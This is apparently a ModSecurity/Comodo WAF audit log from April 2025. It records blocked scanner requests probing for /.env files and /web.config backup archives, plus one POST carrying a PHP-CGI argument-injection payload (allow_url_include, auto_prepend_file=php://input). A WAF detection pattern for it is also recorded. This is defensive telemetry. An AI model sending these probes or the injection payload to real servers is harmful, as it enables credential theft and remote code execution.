--75205b7f-A-- [14/Apr/2025:12:28:28 +0700] Z_yc_IgxSXM4jtK9zHGJTAAAAMI 103.236.140.4 58274 103.236.140.4 8181 --75205b7f-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 165.232.119.168 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 165.232.119.168 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --75205b7f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --75205b7f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744608508623754 873 (- - -) Stopwatch2: 1744608508623754 873; combined=343, p1=307, p2=0, p3=0, p4=0, p5=36, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --75205b7f-Z-- --e9746203-A-- [14/Apr/2025:12:30:24 +0700] Z_ydcNga3eJwvi_gLpI7jQAAAEs 103.236.140.4 58300 103.236.140.4 8181 --e9746203-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 103.114.105.139 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 103.114.105.139 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --e9746203-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e9746203-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744608624601730 916 (- - -) Stopwatch2: 1744608624601730 916; combined=421, p1=381, p2=0, p3=0, p4=0, p5=40, sr=170, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e9746203-Z-- --b6433502-A-- [14/Apr/2025:12:30:26 +0700] Z_ydctga3eJwvi_gLpI7jgAAAFA 103.236.140.4 58304 103.236.140.4 8181 --b6433502-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 103.114.105.139 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 103.114.105.139 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --b6433502-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b6433502-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744608626254920 886 (- - -) Stopwatch2: 1744608626254920 886; combined=417, p1=381, p2=0, p3=0, p4=0, p5=36, sr=156, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b6433502-Z-- --f1661c4e-A-- [14/Apr/2025:12:55:28 +0700] Z_yjUNga3eJwvi_gLpI7xgAAAFI 103.236.140.4 58522 103.236.140.4 8181 --f1661c4e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.81.194 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.81.194 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; RMX1851) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Mobile Safari/537.36 Accept-Charset: utf-8 --f1661c4e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f1661c4e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744610128497816 828 (- - -) Stopwatch2: 1744610128497816 828; combined=332, p1=296, p2=0, p3=0, p4=0, p5=36, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f1661c4e-Z-- --8f97a305-A-- [14/Apr/2025:13:29:35 +0700] Z_yrT1pzfFgMsbYwm2KeRAAAABY 103.236.140.4 58846 103.236.140.4 8181 --8f97a305-B-- GET /.env HTTP/1.0 Host: mignere.twilightparadox.com X-Real-IP: 157.245.105.107 X-Forwarded-Host: mignere.twilightparadox.com X-Forwarded-Server: mignere.twilightparadox.com X-Forwarded-For: 157.245.105.107 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --8f97a305-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8f97a305-H-- Message: Access denied with code 403 (phase 1). 
Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744612175719845 13101 (- - -) Stopwatch2: 1744612175719845 13101; combined=25058, p1=223, p2=0, p3=0, p4=0, p5=12444, sr=66, sw=0, l=0, gc=12391 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8f97a305-Z-- --d93e4467-A-- [14/Apr/2025:14:52:30 +0700] Z_y-vtga3eJwvi_gLpI8gQAAAEE 103.236.140.4 59800 103.236.140.4 8181 --d93e4467-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 103.154.143.162 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 103.154.143.162 X-Forwarded-Proto: http Connection: close Content-Length: 225 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --d93e4467-C-- --d93e4467-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d93e4467-E-- --d93e4467-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. 
[file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1744617150844560 4354 (- - -) Stopwatch2: 1744617150844560 4354; combined=3122, p1=575, p2=2509, p3=0, p4=0, p5=38, sr=161, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d93e4467-Z-- --f905702b-A-- [14/Apr/2025:16:10:20 +0700] Z_zQ_FpzfFgMsbYwm2KfBwAAAAY 103.236.140.4 33230 103.236.140.4 8181 --f905702b-B-- GET /.env HTTP/1.0 Host: vinic.twilightparadox.com X-Real-IP: 138.68.82.23 X-Forwarded-Host: vinic.twilightparadox.com X-Forwarded-Server: vinic.twilightparadox.com X-Forwarded-For: 138.68.82.23 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --f905702b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f905702b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744621820084344 848 (- - -) Stopwatch2: 1744621820084344 848; combined=321, p1=284, p2=0, p3=0, p4=0, p5=36, sr=77, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f905702b-Z-- --c617c712-A-- [14/Apr/2025:16:20:39 +0700] Z_zTZ9ga3eJwvi_gLpI85wAAAFM 103.236.140.4 33284 103.236.140.4 8181 --c617c712-B-- GET /.env HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 196.251.115.37 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 196.251.115.37 X-Forwarded-Proto: http Connection: close Accept: */* User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 --c617c712-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c617c712-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744622439188762 773 (- - -) Stopwatch2: 1744622439188762 773; combined=335, p1=287, p2=0, p3=0, p4=0, p5=48, sr=126, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c617c712-Z-- --93b7453e-A-- [14/Apr/2025:16:20:40 +0700] Z_zTaFpzfFgMsbYwm2KfEgAAABc 103.236.140.4 33288 103.236.140.4 8181 --93b7453e-B-- GET /.env HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 196.251.115.37 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 196.251.115.37 X-Forwarded-Proto: http Connection: close Accept: */* User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 --93b7453e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --93b7453e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744622440537461 736 (- - -) Stopwatch2: 1744622440537461 736; combined=283, p1=255, p2=0, p3=0, p4=0, p5=28, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --93b7453e-Z-- --51471036-A-- [14/Apr/2025:16:54:38 +0700] Z_zbXtPxEtam20ggC7hDYwAAAI0 103.236.140.4 33970 103.236.140.4 8181 --51471036-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.135.193.65 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.135.193.65 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; U; Android 2.2; en-us; Droid Build/FRG22D) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 Accept-Charset: utf-8 --51471036-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --51471036-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744624478968740 826 (- - -) Stopwatch2: 1744624478968740 826; combined=331, p1=296, p2=0, p3=0, p4=0, p5=35, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --51471036-Z-- --28cdee2b-A-- [14/Apr/2025:17:04:20 +0700] Z_zdpNPxEtam20ggC7hDjgAAAJM 103.236.140.4 34158 103.236.140.4 8181 --28cdee2b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 195.211.191.76 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 195.211.191.76 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36 Accept-Charset: utf-8 --28cdee2b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --28cdee2b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744625060131999 875 (- - -) Stopwatch2: 1744625060131999 875; combined=401, p1=365, p2=0, p3=0, p4=0, p5=36, sr=139, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --28cdee2b-Z-- --707b5b56-A-- [14/Apr/2025:17:17:30 +0700] Z_zgutga3eJwvi_gLpI9JwAAAFY 103.236.140.4 34392 103.236.140.4 8181 --707b5b56-B-- GET /web.config.zip HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 159.65.156.239 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 159.65.156.239 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36 --707b5b56-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --707b5b56-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/Web.config" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744625850555965 712 (- - -) Stopwatch2: 1744625850555965 712; combined=299, p1=268, p2=0, p3=0, p4=0, p5=31, sr=108, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --707b5b56-Z-- --7bf1c27c-A-- [14/Apr/2025:17:17:33 +0700] Z_zgvYgxSXM4jtK9zHGKLQAAAMQ 103.236.140.4 34420 103.236.140.4 8181 --7bf1c27c-B-- GET /web.config.rar HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 159.65.156.239 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 159.65.156.239 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36 --7bf1c27c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7bf1c27c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/Web.config" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744625853644779 703 (- - -) Stopwatch2: 1744625853644779 703; combined=277, p1=244, p2=0, p3=0, p4=0, p5=33, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7bf1c27c-Z-- --82ca692f-A-- [14/Apr/2025:17:17:36 +0700] Z_zgwFpzfFgMsbYwm2KfqgAAAAk 103.236.140.4 34448 103.236.140.4 8181 --82ca692f-B-- GET /web.config.7z HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 159.65.156.239 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 159.65.156.239 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36 --82ca692f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --82ca692f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/Web.config" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744625856749453 12834 (- - -) Stopwatch2: 1744625856749453 12834; combined=24642, p1=219, p2=0, p3=0, p4=0, p5=12228, sr=67, sw=0, l=0, gc=12195 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --82ca692f-Z-- --af59064e-A-- [14/Apr/2025:17:17:39 +0700] Z_zgw4gxSXM4jtK9zHGKNQAAAM4 103.236.140.4 34476 103.236.140.4 8181 --af59064e-B-- GET /web.config.tar HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 159.65.156.239 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 159.65.156.239 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36 --af59064e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --af59064e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/Web.config" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744625859903034 648 (- - -) Stopwatch2: 1744625859903034 648; combined=269, p1=237, p2=0, p3=0, p4=0, p5=32, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --af59064e-Z-- --09a7af1b-A-- [14/Apr/2025:17:17:43 +0700] Z_zgx1pzfFgMsbYwm2KfsAAAABQ 103.236.140.4 34504 103.236.140.4 8181 --09a7af1b-B-- GET /web.config.gz HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 159.65.156.239 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 159.65.156.239 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36 --09a7af1b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --09a7af1b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/Web.config" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744625863120974 670 (- - -) Stopwatch2: 1744625863120974 670; combined=252, p1=225, p2=0, p3=0, p4=0, p5=27, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --09a7af1b-Z-- --5e0ee006-A-- [14/Apr/2025:17:17:46 +0700] Z_zgyogxSXM4jtK9zHGKPAAAANY 103.236.140.4 34532 103.236.140.4 8181 --5e0ee006-B-- GET /web.config.tar.gz HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 159.65.156.239 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 159.65.156.239 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36 --5e0ee006-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5e0ee006-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/Web.config" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744625866214480 626 (- - -) Stopwatch2: 1744625866214480 626; combined=249, p1=217, p2=0, p3=0, p4=0, p5=32, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5e0ee006-Z-- --0af3364e-A-- [14/Apr/2025:17:39:47 +0700] Z_zl84gxSXM4jtK9zHGKTQAAAMM 103.236.140.4 34744 103.236.140.4 8181 --0af3364e-B-- GET /.env HTTP/1.0 Host: vinic.twilightparadox.com X-Real-IP: 143.110.217.244 X-Forwarded-Host: vinic.twilightparadox.com X-Forwarded-Server: vinic.twilightparadox.com X-Forwarded-For: 143.110.217.244 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --0af3364e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0af3364e-H-- Message: Access denied with code 403 (phase 1). 
Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744627187211480 826 (- - -) Stopwatch2: 1744627187211480 826; combined=345, p1=318, p2=0, p3=0, p4=0, p5=26, sr=118, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0af3364e-Z-- --52e6e34c-A-- [14/Apr/2025:17:53:26 +0700] Z_zpJlpzfFgMsbYwm2KfxQAAAAo 103.236.140.4 34840 103.236.140.4 8181 --52e6e34c-B-- GET /.env HTTP/1.0 Host: archiexnz.chickenkiller.com X-Real-IP: 164.92.244.132 X-Forwarded-Host: archiexnz.chickenkiller.com X-Forwarded-Server: archiexnz.chickenkiller.com X-Forwarded-For: 164.92.244.132 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --52e6e34c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --52e6e34c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744628006181045 695 (- - -) Stopwatch2: 1744628006181045 695; combined=285, p1=245, p2=0, p3=0, p4=0, p5=39, sr=69, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --52e6e34c-Z-- --00eb3d51-A-- [14/Apr/2025:18:05:44 +0700] Z_zsCNPxEtam20ggC7hEFwAAAJg 103.236.140.4 34940 103.236.140.4 8181 --00eb3d51-B-- GET /.env HTTP/1.0 Host: petruk.hauganslekt.no X-Real-IP: 139.59.136.184 X-Forwarded-Host: petruk.hauganslekt.no X-Forwarded-Server: petruk.hauganslekt.no X-Forwarded-For: 139.59.136.184 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --00eb3d51-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --00eb3d51-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] 